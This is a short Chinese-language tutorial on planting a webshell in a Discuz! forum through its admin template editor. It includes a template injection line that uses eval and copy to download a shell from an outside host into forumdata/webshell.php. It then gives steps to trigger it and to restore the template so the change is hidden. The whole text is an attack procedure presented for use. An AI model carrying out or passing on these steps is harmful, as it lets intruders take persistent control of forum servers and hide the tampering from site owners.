Discuz! 后台拿webshell万能方法:
前提条件:要拿到论坛管理员的密码,能够编辑模板文件
步骤:
1. 找一个空间上传一个wehsehll,注意这个webshell不要让服务器解析,一般使用txt文件就可以了。地址如:http://www.51safe.net/webshell.txt
2.随便选择一个模板(如:my),然后在任意位置输入:
PHP代码
- {eval copy('http://www.51safe.net/webshell.txt', DISCUZ_ROOT.'./forumdata/webshell.php');}
3.保存,然后更新论坛缓存,更新模板缓存
4.访问该模板所属的php文件(如:my.php)
5.把模板修改成原始状态
这样一个webshell就生成了,地址是:http://论坛地址/forumdata/webshell.php